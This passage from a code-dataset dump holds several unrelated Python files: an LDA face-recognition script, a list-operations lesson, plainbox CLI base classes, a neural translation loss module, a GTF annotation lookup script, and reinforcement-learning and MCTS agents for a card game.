import_processing(INPUT_PATH)\n Wpca = reduce_by_PCA(training_data, means)\n class_means = compute_class_means(training_data)\n class_scatters = compute_class_scatters(training_data, class_means)\n Sb = compute_Sb(class_means)\n SB_RANK = np.linalg.matrix_rank(Sb) # Rank is c - 1 -> 51\n # print(SB_RANK)\n Sw = compute_Sw(class_scatters)\n SW_RANK = np.linalg.matrix_rank(Sw) # Rank is N - c -> 312(train_imgs) - 52 = 260 (same as PCA reduction)\n # print(SW_RANK)\n reference_LDA_coeffs, fisherfaces = compute_LDA_Fisherfaces(Sw, Sb, Wpca, training_data)\n # CHECKED THIS FAR\n\n # fish_images = goto_original_domain(fisherfaces, Wpca)\n # display_eigenvectors(fish_images)\n\n # ''' Start classification procedure'''\n candidate_LDA_coeffs = find_fisher_coeffs(testing_data, Wpca, fisherfaces)\n classification = classify(reference_LDA_coeffs, candidate_LDA_coeffs)\n ground_truth = create_ground_truth()\n bool_array, accuracy = bool_and_accuracy(ground_truth, classification)\n\n failures = identify_failure(bool_array)\n success = identify_success(bool_array)\n\n conf_matrix = confusion_matrix(ground_truth, classification)\n if DISPLAY:\n plot_confusion_matrix(conf_matrix, np.arange(0, NUMBER_PEOPLE), normalize=True)\n display_eigenvectors(testing_data[:, failures] + means[0][:, None])\n display_eigenvectors(testing_data[:, success] + means[0][:, None])\n\n\n print(accuracy)\n\n accuracies.append(accuracy)\n M_PCAs.append(M_PCA)\n save_dict = {'accuracy': accuracies, 'training_split': TRAINING_SPLIT, 'M_PCA': M_PCAs, 'M_LDA': M_LDA,\n 'Sb_rank': SB_RANK, 'Sw_rank': SW_RANK}\n save_name = 'split_{}m_lda{}VARY_M_PCA'.format(TRAINING_SPLIT, M_LDA)\n save_values(save_dict, name=save_name)\n\n # M_PCA_reduction -= 15\n","repo_name":"timotheegath/PR1","sub_path":"ex2LDA.py","file_name":"ex2LDA.py","file_ext":"py","file_size_in_byte":9129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"39440343523","text":"l = [3, 3, 2, 4, 4, 5, 2, 1]\n# 0, 1, 2, 3, 4, 5, 6\n\n# insert\n# l.append(0) # if you only want to insert at the end, please use append\n# l.insert(2, 100) # insert is expensive, append is cheap\n# print(l)\n\n# delete\n# delete based on index\n# val = l.pop() # remove the last\n# val = l.pop(3)\n# print(l, val)\n# delete based on value\n# l.remove(2)\n# print(l)\n\nmax_num = max(l)\nmin_num = min(l)\nsum_num = sum(l)\nprint(max_num, min_num, sum_num)","repo_name":"ybao2000/algorithm_saturday","sub_path":"Lesson_01/list_operation_test.py","file_name":"list_operation_test.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"6215424443","text":"import abc\nimport logging\n\nfrom plainbox.i18n import gettext as _\nfrom plainbox.impl.clitools import CommandBase, ToolBase\nfrom plainbox.impl.providers.special import get_stubbox_def\nfrom plainbox.impl.providers.v1 import all_providers\nfrom plainbox.impl.secure.providers.v1 import Provider1\n\n\nlogger = logging.getLogger(\"plainbox.commands\")\n\n\nclass PlainBoxToolBase(ToolBase):\n \"\"\"\n Base class for implementing commands like 'plainbox'.\n\n The tools support a variety of sub-commands, logging and debugging\n support. If argcomplete module is available and used properly in\n the shell then advanced tab-completion is also available.\n\n There are four methods to implement for a basic tool. Those are:\n\n 1. :meth:`get_exec_name()` -- to know how the command will be called\n 2. :meth:`get_exec_version()` -- to know how the version of the tool\n 3. :meth:`add_subcommands()` -- to add some actual commands to execute\n 4. :meth:`get_config_cls()` -- to know which config to use\n\n This class has some complex control flow to support important and\n interesting use cases. There are some concerns to people that subclass this\n in order to implement their own command line tools.\n\n The first concern is that input is parsed with two parsers, the early\n parser and the full parser. The early parser quickly checks for a fraction\n of supported arguments and uses that data to initialize environment before\n construction of a full parser is possible. The full parser sees the\n reminder of the input and does not re-parse things that where already\n handled.\n\n The second concern is that this command natively supports the concept of a\n config object and a provider object. This may not be desired by all users\n but it is the current state as of this writing. This means that by the time\n eary init is done we have a known provider and config objects that can be\n used to instantiate command objects in :meth:`add_subcommands()`. This API\n might change when full multi-provider is available but details are not\n known yet.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Initialize all the variables, real stuff happens in main()\n \"\"\"\n super().__init__()\n self._config = None # set in late_init()\n self._provider_list = [] # updated in late_init()\n\n @classmethod\n @abc.abstractmethod\n def get_config_cls(cls):\n \"\"\"\n Get the Config class that is used by this implementation.\n\n This can be overridden by subclasses to use a different config class\n that is suitable for the particular application.\n \"\"\"\n\n def late_init(self, early_ns):\n \"\"\"\n Overridden version of late_init().\n\n This method loads the configuration object and the list of providers\n and stores them as instance attributes.\n \"\"\"\n super().late_init(early_ns)\n # Load plainbox configuration\n self._config = self.get_config_cls().get()\n # XXX: we cannot change _provider_list as the particular list object is\n # already passed as argument to several command classes. 
It seems safe\n # to append items to it though.\n self._provider_list.extend(self.get_provider_list(early_ns))\n\n def get_provider_list(self, ns):\n \"\"\"\n Get the list of job providers.\n\n This method looks at --providers argument to figure out which\n providers to expose to all of the commands.\n \"\"\"\n # If the default value of 'None' was set for the checkbox (provider)\n # argument then load the actual provider name from the configuration\n # object (default for that is 'auto').\n if ns.providers is None:\n ns.providers = self._config.default_provider\n assert ns.providers in ('all', 'stub')\n # Decide which providers to expose to the rest of plainbox\n if ns.providers == 'all':\n return self._load_really_all_providers()\n elif ns.providers == 'stub':\n return self._load_stub_provider_only()\n\n def _load_really_all_providers(self):\n provider_list = []\n # StubBox is always enabled\n provider_list.append(\n Provider1.from_definition(get_stubbox_def(), secure=False))\n # Load all normal providers\n all_providers.load()\n provider_list.extend(all_providers.get_all_plugin_objects())\n return provider_list\n\n def _load_stub_provider_only(self):\n return [Provider1.from_definition(get_stubbox_def(), secure=False)]\n\n def add_early_parser_arguments(self, parser):\n \"\"\"\n Overridden version of add_early_parser_arguments().\n\n This method adds the --providers argument to the set of early parser\n arguments, so that it is visible in autocomplete and help.\n \"\"\"\n group = parser.add_argument_group(\n title=_(\"provider list and development\"))\n group.add_argument(\n '--providers',\n action='store',\n choices=['all', 'stub'],\n # None is a special value that means 'use whatever is configured'\n default=None,\n help=_(\"which providers to load\"))\n super().add_early_parser_arguments(parser)\n\n\nclass PlainBoxCommand(CommandBase):\n \"\"\"\n Simple interface class for plainbox commands.\n\n Command objects like this are consumed by PlainBoxTool subclasses to\n implement hierarchical command system. The API supports arbitrary many sub\n commands in arbitrary nesting arrangement.\n \"\"\"\n\n gettext_domain = \"plainbox\"\n","repo_name":"Roadmaster/checkbox","sub_path":"plainbox/plainbox/impl/commands/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"8552415650","text":"\"\"\"\nThis file handles the details of the loss function during training.\n\nThis includes: LossComputeBase and the standard NMTLossCompute, and\n sharded loss compute stuff.\n\"\"\"\nfrom __future__ import division\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\n\nimport onmt\nimport onmt.io\n\nTGT_VOCAB_SIZE = 606\nclass LossComputeBase(nn.Module):\n \"\"\"\n Class for managing efficient loss computation. Handles\n sharding next step predictions and accumulating mutiple\n loss computations\n\n\n Users can implement their own loss computation strategy by making\n subclass of this one. Users need to implement the _compute_loss()\n and make_shard_state() methods.\n\n Args:\n generator (:obj:`nn.Module`) :\n module that maps the output of the decoder to a\n distribution over the target vocabulary.\n tgt_vocab (:obj:`Vocab`) :\n torchtext vocab object representing the target output\n normalzation (str): normalize by \"sents\" or \"tokens\"\n \"\"\"\n def __init__(self, generator, tgt_vocab):\n super(LossComputeBase, self).__init__()\n self.generator = generator\n self.tgt_vocab = tgt_vocab\n self.padding_idx = tgt_vocab.stoi[onmt.io.PAD_WORD]\n\n def _make_shard_state(self, batch, output, range_, attns=None):\n \"\"\"\n Make shard state dictionary for shards() to return iterable\n shards for efficient loss computation. Subclass must define\n this method to match its own _compute_loss() interface.\n Args:\n batch: the current batch.\n output: the predict output from the model.\n range_: the range of examples for computing, the whole\n batch or a trunc of it?\n attns: the attns dictionary returned from the model.\n \"\"\"\n return NotImplementedError\n\n def _compute_loss(self, batch, output, target, **kwargs):\n \"\"\"\n Compute the loss. Subclass must define this method.\n\n Args:\n\n batch: the current batch.\n output: the predict output from the model.\n target: the validate target to compare output with.\n **kwargs(optional): additional info for computing loss.\n \"\"\"\n return NotImplementedError\n\n def monolithic_compute_loss(self, batch, output, attns, stage1=True):\n \"\"\"\n Compute the forward loss for the batch.\n\n Args:\n batch (batch): batch of labeled examples\n output (:obj:`FloatTensor`):\n output of decoder model `[tgt_len x batch x hidden]`\n attns (dict of :obj:`FloatTensor`) :\n dictionary of attention distributions\n `[tgt_len x batch x src_len]`\n stage1: is it stage1\n Returns:\n :obj:`onmt.Statistics`: loss statistics\n \"\"\"\n if stage1:\n range_ = (0, batch.tgt1.size(0))\n else:\n range_ = (0, batch.tgt2.size(0))\n shard_state = self._make_shard_state(batch, output, range_, attns)\n _, batch_stats = self._compute_loss(batch, **shard_state)\n\n return batch_stats\n\n def sharded_compute_loss(self, batch, output, attns,\n cur_trunc, trunc_size, shard_size,\n normalization, retain_graph=False):\n \"\"\"Compute the forward loss and backpropagate. Computation is done\n with shards and optionally truncation for memory efficiency.\n\n Also supports truncated BPTT for long sequences by taking a\n range in the decoder output sequence to back propagate in.\n Range is from `(cur_trunc, cur_trunc + trunc_size)`.\n\n Note sharding is an exact efficiency trick to relieve memory\n required for the generation buffers. 
Truncation is an\n approximate efficiency trick to relieve the memory required\n in the RNN buffers.\n\n Args:\n batch (batch) : batch of labeled examples\n output (:obj:`FloatTensor`) :\n output of decoder model `[tgt_len x batch x hidden]`\n attns (dict) : dictionary of attention distributions\n `[tgt_len x batch x src_len]`\n cur_trunc (int) : starting position of truncation window\n trunc_size (int) : length of truncation window\n shard_size (int) : maximum number of examples in a shard\n normalization (int) : Loss is divided by this number\n\n Returns:\n :obj:`onmt.Statistics`: validation loss statistics\n\n \"\"\"\n batch_stats = onmt.Statistics()\n range_ = (cur_trunc, cur_trunc + trunc_size)\n shard_state = self._make_shard_state(batch, output, range_, attns)\n\n for shard in shards(shard_state, shard_size, retain_graph=retain_graph):\n loss, stats = self._compute_loss(batch, **shard)\n\n loss.div(normalization).backward()\n batch_stats.update(stats)\n\n return batch_stats\n\n def _stats(self, loss, scores, target):\n \"\"\"\n Args:\n loss (:obj:`FloatTensor`): the loss computed by the loss criterion.\n scores (:obj:`FloatTensor`): a score for each possible output\n target (:obj:`FloatTensor`): true targets\n\n Returns:\n :obj:`Statistics` : statistics for this batch.\n \"\"\"\n pred = scores.max(1)[1]\n non_padding = target.ne(self.padding_idx)\n num_correct = pred.eq(target) \\\n .masked_select(non_padding) \\\n .sum()\n return onmt.Statistics(loss[0], non_padding.sum(), num_correct)\n\n def _bottle(self, v):\n return v.view(-1, v.size(2))\n\n def _unbottle(self, v, batch_size):\n return v.view(-1, batch_size, v.size(1))\n\n\nclass NMTLossCompute(LossComputeBase):\n \"\"\"\n Standard NMT Loss Computation.\n \"\"\"\n def __init__(self, generator, tgt_vocab, normalization=\"sents\",\n label_smoothing=0.0, decoder_type='rnn'):\n super(NMTLossCompute, self).__init__(generator, tgt_vocab)\n assert (label_smoothing >= 0.0 and label_smoothing <= 1.0)\n self.decoder_type = decoder_type\n if label_smoothing > 0:\n # When label smoothing is turned on,\n # KL-divergence between q_{smoothed ground truth prob.}(w)\n # and p_{prob. 
computed by model}(w) is minimized.\n # If label smoothing value is set to zero, the loss\n # is equivalent to NLLLoss or CrossEntropyLoss.\n # All non-true labels are uniformly set to low-confidence.\n self.criterion = nn.KLDivLoss(size_average=False)\n one_hot = torch.randn(1, len(tgt_vocab))\n one_hot.fill_(label_smoothing / (len(tgt_vocab) - 2))\n one_hot[0][self.padding_idx] = 0\n self.register_buffer('one_hot', one_hot)\n else:\n if self.decoder_type == 'pointer':\n weight = torch.ones(TGT_VOCAB_SIZE)\n else:\n weight = torch.ones(len(tgt_vocab))\n weight[self.padding_idx] = 0\n self.criterion = nn.NLLLoss(weight, size_average=False)\n self.confidence = 1.0 - label_smoothing\n\n def _make_shard_state(self, batch, output, range_, attns=None):\n if self.decoder_type == 'pointer':\n return {\n \"output\": attns['std'],\n \"target\": batch.tgt1_planning[range_[0] + 1: range_[1]]\n }\n else:\n assert False\n return {\n \"output\": output,\n \"target\": batch.tgt[range_[0] + 1: range_[1]],\n }\n\n def _compute_loss(self, batch, output, target):\n if self.decoder_type == 'pointer':\n scores = self._bottle(output)\n else:\n scores = self.generator(self._bottle(output))\n\n gtruth = target.view(-1)\n if self.confidence < 1:\n tdata = gtruth.data\n mask = torch.nonzero(tdata.eq(self.padding_idx)).squeeze()\n log_likelihood = torch.gather(scores.data, 1, tdata.unsqueeze(1))\n tmp_ = self.one_hot.repeat(gtruth.size(0), 1)\n tmp_.scatter_(1, tdata.unsqueeze(1), self.confidence)\n if mask.dim() > 0:\n log_likelihood.index_fill_(0, mask, 0)\n tmp_.index_fill_(0, mask, 0)\n gtruth = Variable(tmp_, requires_grad=False)\n\n loss = self.criterion(scores, gtruth)\n if self.confidence < 1:\n # Default: report smoothed ppl.\n # loss_data = -log_likelihood.sum(0)\n loss_data = loss.data.clone()\n else:\n loss_data = loss.data.clone()\n\n stats = self._stats(loss_data, scores.data, target.view(-1).data)\n\n return loss, stats\n\n\ndef filter_shard_state(state, requires_grad=True, volatile=False):\n for k, v in state.items():\n if v is not None:\n if isinstance(v, Variable) and v.requires_grad:\n v = Variable(v.data, requires_grad=requires_grad,\n volatile=volatile)\n yield k, v\n\n\ndef shards(state, shard_size, eval=False, retain_graph=False):\n \"\"\"\n Args:\n state: A dictionary which corresponds to the output of\n *LossCompute._make_shard_state(). The values for\n those keys are Tensor-like or None.\n shard_size: The maximum size of the shards yielded by the model.\n eval: If True, only yield the state, nothing else.\n Otherwise, yield shards.\n\n Yields:\n Each yielded shard is a dict.\n\n Side effect:\n After the last shard, this function does back-propagation.\n \"\"\"\n if eval:\n yield filter_shard_state(state, False, True)\n else:\n # non_none: the subdict of the state dictionary where the values\n # are not None.\n non_none = dict(filter_shard_state(state))\n\n # Now, the iteration:\n # state is a dictionary of sequences of tensor-like but we\n # want a sequence of dictionaries of tensors.\n # First, unzip the dictionary into a sequence of keys and a\n # sequence of tensor-like sequences.\n keys, values = zip(*((k, torch.split(v, shard_size))\n for k, v in non_none.items()))\n\n # Now, yield a dictionary for each shard. The keys are always\n # the same. values is a sequence of length #keys where each\n # element is a sequence of length #shards. 
We want to iterate\n # over the shards, not over the keys: therefore, the values need\n # to be re-zipped by shard and then each shard can be paired\n # with the keys.\n for shard_tensors in zip(*values):\n yield dict(zip(keys, shard_tensors))\n\n # Assumed backprop'd\n variables = ((state[k], v.grad.data) for k, v in non_none.items()\n if isinstance(v, Variable) and v.grad is not None)\n inputs, grads = zip(*variables)\n torch.autograd.backward(inputs, grads, retain_graph=retain_graph)\n","repo_name":"ratishsp/data2text-plan-py","sub_path":"onmt/Loss.py","file_name":"Loss.py","file_ext":"py","file_size_in_byte":11029,"program_lang":"python","lang":"en","doc_type":"code","stars":160,"dataset":"github-code","pt":"71"}
+{"seq_id":"9105326314","text":"#!/usr/bin/env python3\n\n\"\"\"\nRetrieve annotations closest to the query position from a GTF file.\n\"\"\"\n\nimport sys\n\ndef indexGTF(file):\n index = dict()\n with open(file, \"r\") as f:\n buffer = f.readlines()\n f.close()\n\n n = 0\n for line in buffer:\n if len(line.split(\"\\t\")) <= 1:\n n += 1\n else:\n break\n\n # Remove header\n # print(f\"Removing {n} lines from GTF file\")\n for i in range(n + 1):\n buffer.pop(0)\n\n # Remove bad footers from annotation file\n if len(buffer[len(buffer) - 1].split(\"\\t\")) <= 1:\n buffer.pop(len(buffer) - 1)\n\n for line in buffer:\n x = line.split(\"\\t\")\n try:\n name = x[0]\n source = x[1]\n feature = x[2]\n start = x[3]\n stop = x[4]\n except IndexError:\n print(f\"Bad line: {line}\")\n\n index[name] = [feature, start, stop]\n\n return index\n\ndef showNearestStart(query, index):\n print(f\"> Showing nearest items for starting position query: {query}\")\n\n x = list()\n for i in index:\n pos = index[i][1]\n dist = int(query) - int(pos)\n index[i] = index[i].append(dist)\n x.append([i, dist])\n\n y = list()\n for i in x:\n y.append(abs(i[1]))\n print(min(y))\n\nquery = sys.argv[1]\nindex = indexGTF(sys.argv[2])\n\nshowNearestStart(query, index)\n\n# 1. Index GTF file (get start and end positions, with annotation name)\n# 2. Get query position, and get distance from start position\n# 3. Print annotations with lowest distance\n","repo_name":"ycoles448/wheat-rna-pipeline","sub_path":"bin/getGTFPositions.py","file_name":"getGTFPositions.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"27685307044","text":"import numpy as np\nimport random\nfrom states import rotate_state\nfrom mcts import transform_action_key,MCTSNode\n\nimport asyncio\nimport ipywidgets as widgets\nfrom IPython.display import display,clear_output\n\nclass Agent:\n def __init__(self):\n self.last_observation_id = 0\n\n def cache_samples(self):\n pass\n\n def observe(self,observation_id,prev_action,state,start_flag,end_flag):\n pass\n\n def act(self,state):\n action_set = state.action_set\n a_idx = np.random.choice(len(action_set))\n return action_set[a_idx]\n\nclass RandomAgent(Agent):\n def __init__(self,seed):\n self.last_observation_id = 0\n self.seed = seed\n\n def act(self,state):\n np.random.seed(self.seed)\n action_set = state.action_set\n a_idx = np.random.choice(len(action_set))\n return action_set[a_idx]\n\nclass IpyAgent(Agent):\n def act(self,state):\n ## first, print out relevant infos\n print('-' * 50)\n print('Interactive player:')\n headers,curr_plays,remain_plays = [],[],[]\n for player_idx in range(4):\n target_player = (state.curr_player - len(state.round_plays) + player_idx) % 4\n \n header = ''\n if target_player == state.house:\n header += '△ '\n if player_idx == len(state.round_plays):\n header += '--> '\n target_header = '{}Player {} '.format(header,target_player)\n \n if player_idx < len(state.round_plays):\n target_curr_play = state.ruler.get_codes_repr(state.round_plays[player_idx][1])\n else:\n target_curr_play = '-' * 3\n\n target_remain_structs = state.structs_by_player[target_player]\n target_remain_play = []\n for struct in target_remain_structs:\n struct_codes = state.ruler.get_codes_repr(sum([component[-1] for component in struct[1]],()))\n if struct_codes == '':\n struct_codes = '-' * 3\n target_remain_play.append(struct_codes)\n target_remain_play = ' / '.join(target_remain_play)\n\n headers.append(target_header)\n curr_plays.append(target_curr_play)\n remain_plays.append(target_remain_play)\n\n header_max = np.max([len(header) for header in headers])\n curr_play_max = np.max([len(curr_play) for curr_play in curr_plays])\n for header,curr_play,remain_play in zip(headers,curr_plays,remain_plays):\n print('{} | this round: {} | remain cards: {}.'.format(\n header.ljust(header_max),curr_play.ljust(curr_play_max),remain_play))\n print('-' * 25)\n\n if len(state.best_codes) > 0:\n round_best_play = state.ruler.get_codes_repr(state.best_codes)\n else:\n round_best_play = '-' * 3\n print('Game major {}. Round best play {}, round total score {}. Current game score {}. 
Stack {}.'.format(\n state.ruler.get_code_repr(51),\n round_best_play,\n sum([state.ruler.get_codes_score(codes) for _,codes in state.round_plays],0),\n state.game_score,\n state.ruler.get_codes_repr(state.stack)))\n print('-' * 25)\n\n ## now provide the options\n action_set = state.action_set\n label0,value0 = 'Please select from below:',([],None,False)\n options = [(label0,value0)] + \\\n [(state.ruler.get_codes_repr(action[0]),action) for action in action_set]\n if len(action_set[0][0]) > 2 and not state.is_first:\n options += [('other combinations',None)] ## allow for combination of single cards\n dropbox = widgets.Dropdown(options=options,index=0,value=value0,label=label0)\n display(dropbox)\n future = asyncio.Future()\n def getvalue(change):\n future.set_result(change.new)\n dropbox.close()\n dropbox.observe(getvalue, 'value')\n return future\n \n def act_single(self,state):\n struct = state.structs_by_player[state.curr_player]\n codes = []\n for suit_enc in range(4):\n for component in struct[suit_enc][1]:\n codes.extend(component[-1])\n codes = sorted(codes)\n label0,value0 = 'Please select from below:',-1\n options = [(label0,value0)] + \\\n [(state.ruler.get_code_repr(code),code) for code in codes] + \\\n [('confirmed',-2)]\n dropbox = widgets.SelectMultiple(options=options,index=[0],value=[value0],label=[label0])\n display(dropbox)\n future = asyncio.Future()\n def getvalue(change):\n if 'confirmed' in dropbox.label:\n if len(dropbox.label) != state.round_num+1:\n print('please recheck size of your play!',end='\\r')\n else:\n future.set_result(change.new)\n dropbox.close()\n else:\n print(','.join([item for item in dropbox.label if item != label0]),end='\\r')\n dropbox.observe(getvalue, 'value')\n return future\n\nclass RlAgent(Agent):\n def __init__(self,model):\n self.action_model = model\n \n self.debug_flag = False\n self.infer_flag = False\n self.sample_collect_flag = False\n self.last_observation_id = 0\n self.value_bootstrap_partial_sample = None\n self.value_bootstrap_samples_cache = []\n\n def cache_samples(self):\n for sample in self.value_bootstrap_samples_cache:\n self.action_model.add_experience(sample)\n self.value_bootstrap_samples_cache = []\n\n def observe(self,observation_id,prev_action,state,start_flag,end_flag):\n if observation_id != self.last_observation_id:\n self.last_observation_id = observation_id\n if self.sample_collect_flag:\n state_vec,actions_vec,direc = state.get_vecs()\n if start_flag:\n self.value_bootstrap_partial_sample = None\n\n if end_flag:\n ## end of game \n if self.value_bootstrap_partial_sample is not None and len(self.value_bootstrap_partial_sample) == 3:\n prev_state_vec,prev_action_vec,prev_score = self.value_bootstrap_partial_sample\n self.value_bootstrap_samples_cache.append((prev_state_vec,prev_action_vec,state.eval_score-prev_score,True,direc,state_vec,actions_vec))\n self.value_bootstrap_partial_sample = None\n\n self.cache_samples()\n \n def act(self,state):\n state_vec,actions_vec,direc = state.get_vecs()\n action_set = state.action_set\n Na = len(action_set)\n if Na == 1:\n a_idx = 0\n else:\n ## rotation\n r = np.random.choice(4)\n rotate_direc = (1 if r % 2 == 0 else -1)\n direc_tmp = direc * rotate_direc\n state_vec_tmp = rotate_state(state_vec,r)\n q_values,probs,action_samples = self.action_model.predict(state_vec_tmp,actions_vec,direc_tmp)\n q_values = q_values * rotate_direc\n \n # q_values,probs,action_samples = self.action_model.predict(state_vec,actions_vec,direc)\n if self.debug_flag:\n ruler = state.ruler\n 
sort_idxs = np.argsort(q_values)[::-1]\n debug_str = ';'.join(\n [' {},{:.2f}'.format(ruler.get_codes_repr(action_set[i][0]),q_values[i]) \n for i in sort_idxs])\n print(debug_str)\n \n # for r in range(4):\n # state_vec_tmp = rotate_state(state_vec,r)\n # direc_tmp = direc * (1 if r % 2 == 0 else -1)\n # qs_tmp,p_tmp,a_tmp = self.action_model.predict(state_vec_tmp,actions_vec,direc_tmp)\n # print(r,qs_tmp,a_tmp)\n \n if self.infer_flag or random.random() < 0.9:\n a_idx = action_samples\n else:\n a_idx = np.random.choice(Na)\n\n if self.sample_collect_flag:\n ## value bootstrap samples: Q(state,action) -> next reward - current reward + (1 - end) * V(next_state,next_action,next_direc)\n ## manage the previous partial sample (if any) and init the next partial sample\n if self.value_bootstrap_partial_sample is not None and len(self.value_bootstrap_partial_sample) == 3:\n prev_state_vec,prev_action_vec,prev_score = self.value_bootstrap_partial_sample\n self.value_bootstrap_samples_cache.append((prev_state_vec,prev_action_vec,state.eval_score-prev_score,False,direc,state_vec,actions_vec))\n self.value_bootstrap_partial_sample = (state_vec,actions_vec[:,a_idx],state.eval_score)\n\n return action_set[a_idx]\n\nclass MCTSAgent(Agent):\n def __init__(self,model,sim_env,N_search=1000,c_puct=400,temp=1,explore_alpha=0.25,batch_size=8):\n self.action_model = model\n self.sim_env = sim_env\n self.N_search = N_search\n self.c_puct = c_puct\n self.temp = temp\n self.explore_alpha = explore_alpha\n self.batch_size = batch_size\n self.root_node = None\n \n self.debug_flag = False\n self.infer_flag = False\n self.sample_collect_flag = False\n self.last_observation_id = 0\n self.samples_cache = []\n self.samples_partial_cache = []\n\n def cache_samples(self):\n for sample in self.samples_cache:\n self.action_model.add_experience(sample,exp_pool_id=0)\n self.samples_cache = []\n\n def observe(self,observation_id,prev_action,state,start_flag,end_flag):\n if observation_id != self.last_observation_id:\n self.last_observation_id = observation_id\n if start_flag:\n self.init_mcts_tree(state)\n else:\n self.update_mcts_tree(prev_action,state,end_flag)\n\n ## check if the game ends\n if self.sample_collect_flag and end_flag:\n ## value samples: Q(state,action) -> final reward - current reward\n ## update the value samples here\n for sample in self.samples_partial_cache:\n if len(sample) == 6:\n if len(sample[4]) == 1:\n self.samples_cache.append((sample[0],sample[1],sample[2],state.eval_score-sample[3],sample[4],[state.eval_score-sample[3]]))\n else:\n self.samples_cache.append((sample[0],sample[1],sample[2],state.eval_score-sample[3],sample[4],sample[5]))\n self.samples_partial_cache = []\n\n self.cache_samples()\n\n def act(self,state):\n return self.mcts_search(state)\n\n def get_predict_values(self,state):\n if (state.actions_vec.shape[1]) > 0:\n q_values,probs,_ = self.action_model.predict(*state.get_vecs())\n return q_values + state.eval_score,probs\n else:\n return None,None\n\n def init_mcts_tree(self,state):\n self.root_node = MCTSNode(level=0,father=None,father_direc=0,prev_action=None,prob_sa=1,c_puct=self.c_puct)\n self.init_root_node(self.root_node,state)\n\n def update_mcts_tree(self,prev_action,state,end_flag):\n if not end_flag:\n if self.root_node is None or prev_action is None:\n # print('restart mcts tree!')\n self.init_mcts_tree(state)\n else:\n prev_codes = tuple(sorted(prev_action[0]))\n if prev_codes in self.root_node.children:\n self.root_node = self.root_node.children[prev_codes]\n if not 
self.root_node.is_expanded:\n self.init_root_node(self.root_node,state)\n self.root_node.set_root()\n else:\n self.init_mcts_tree(state)\n\n def init_root_node(self,node,state):\n q_values,probs = self.get_predict_values(state)\n node.state = state\n node.predict_value = state.eval_score\n ## add dirichlet noise to the prior\n dirichlet_noise = np.random.dirichlet(np.full((len(probs),),0.3))\n node.child_probs = probs * (1 - self.explore_alpha) + self.explore_alpha * dirichlet_noise\n # node.child_probs = probs\n self.expand_node(node)\n node.set_root()\n\n def evaluate_node(self,node):\n _,end_flag,state = self.sim_env.step(node.father.state.copy(),node.prev_action,if_display=False)\n if end_flag:\n node.is_leaf = True\n node.predict_value = state.eval_score\n self.update_node(node)\n else:\n node.state = state\n node.is_evaluating = True\n\n def expand_node(self,node):\n next_level = node.level + 1\n # na = len(node.state.action_set)\n node.children = {}\n for prev_action,prob_sa in (zip(node.state.action_set,node.child_probs)):\n node.children[transform_action_key(prev_action)] = MCTSNode(level=next_level,father=node,father_direc=node.state.curr_direc,prev_action=prev_action,\n prob_sa=prob_sa,\n # prob_sa=1/na,\n c_puct=self.c_puct)\n\n node.is_expanded = True\n\n def update_node(self,node):\n # print(node.predict_value)\n value = node.predict_value\n node.update_value(value)\n while (node.father is not None and not node.is_root):\n node = node.father\n node.update_value(value)\n\n def predict_node_batch(self,nodes_queue):\n if len(nodes_queue) > 1:\n max_mask_len = 0\n s_batch,mask_len_batch,direc_batch = [],[],[]\n for node in nodes_queue:\n state = node.state\n state_vec,actions_vec,direc = state.get_vecs()\n mask_len = len(state.action_set)\n s_batch.append(state_vec)\n mask_len_batch.append(mask_len)\n direc_batch.append(direc)\n if mask_len > max_mask_len:\n max_mask_len = mask_len\n\n As = np.zeros((len(nodes_queue),max_mask_len,55),dtype=np.float32)\n for idx,node in enumerate(nodes_queue):\n state = node.state\n mask_len = len(state.action_set)\n As[idx:(idx+1),:mask_len] = state.actions_vec\n v_batch,probs_batch = \\\n self.action_model.predict_batch(\n np.concatenate(s_batch,axis=0),As,\n np.array(mask_len_batch,dtype=np.int64),\n np.array(direc_batch,dtype=np.float32))\n else:\n state = nodes_queue[0].state\n state_vec,actions_vec,direc = state.get_vecs()\n v_batch,probs_batch = \\\n self.action_model.predict_batch(\n state_vec,\n actions_vec,\n np.array([len(state.action_set)],dtype=np.int64),\n np.array([direc],dtype=np.float32))\n\n for node,v,probs in zip(nodes_queue,v_batch,probs_batch):\n na = len(node.state.action_set)\n node.predict_value = node.state.eval_score + v\n node.child_probs = np.maximum(probs[:na],1e-2)\n node.is_evaluating = False\n node.is_evaluated = True\n self.update_node(node)\n\n def mcts_search(self,state):\n action_set = state.action_set\n Na = len(action_set)\n if Na == 1: ## TODO: consider remove this part for more consistent training samples\n action = action_set[0]\n if self.sample_collect_flag:\n ## value samples: Q(state,action) -> final reward - current reward\n ## only init parts here; append the final reward at the end of the game\n state_vec,actions_vec,direc = state.get_vecs()\n self.samples_partial_cache.append((state_vec,actions_vec,direc,state.eval_score,[1],[state.eval_score]))\n else:\n if self.root_node is None:\n self.init_mcts_tree(state)\n\n N_total = max(self.N_search,Na)\n # dirichlet_noise = 
np.random.dirichlet(np.full((Na,),0.3),N_total+1)\n # dirichlet_noise_value = dirichlet_noise * self.explore_alpha * self.c_puct\n \n # ## print fix depth tree\n # ruler = state.ruler\n # curr_node_prints = [([],[],self.root_node)]\n # for level in range(2):\n # str_ = []\n # curr_node_prints_next = []\n # for key_father,key_curr,node in curr_node_prints:\n # str_.append('({})->({}),{:.0f},{:.0f},{:.0f}'.format(ruler.get_codes_repr(key_father),ruler.get_codes_repr(key_curr),node.predict_value,node.sim_count,node.sim_value))\n # if node.children is not None:\n # for key,value in node.children.items():\n # curr_node_prints_next.append((key_curr,key,value))\n # curr_node_prints = curr_node_prints_next\n # if level > 0:\n # print(level,'; '.join(str_))\n\n counts = 0\n nodes_queue = []\n while counts < N_total:\n if len(nodes_queue) >= self.batch_size:\n self.predict_node_batch(nodes_queue)\n nodes_queue = []\n\n # while len(nodes_queue) < self.batch_size and counts < N_total:\n counts += 1\n curr_node = self.root_node\n # print(counts,self.root_node.sim_count)\n while True:\n if curr_node.is_evaluating:\n self.predict_node_batch(nodes_queue)\n nodes_queue = []\n\n curr_node.update_count()\n\n if curr_node.is_leaf:\n 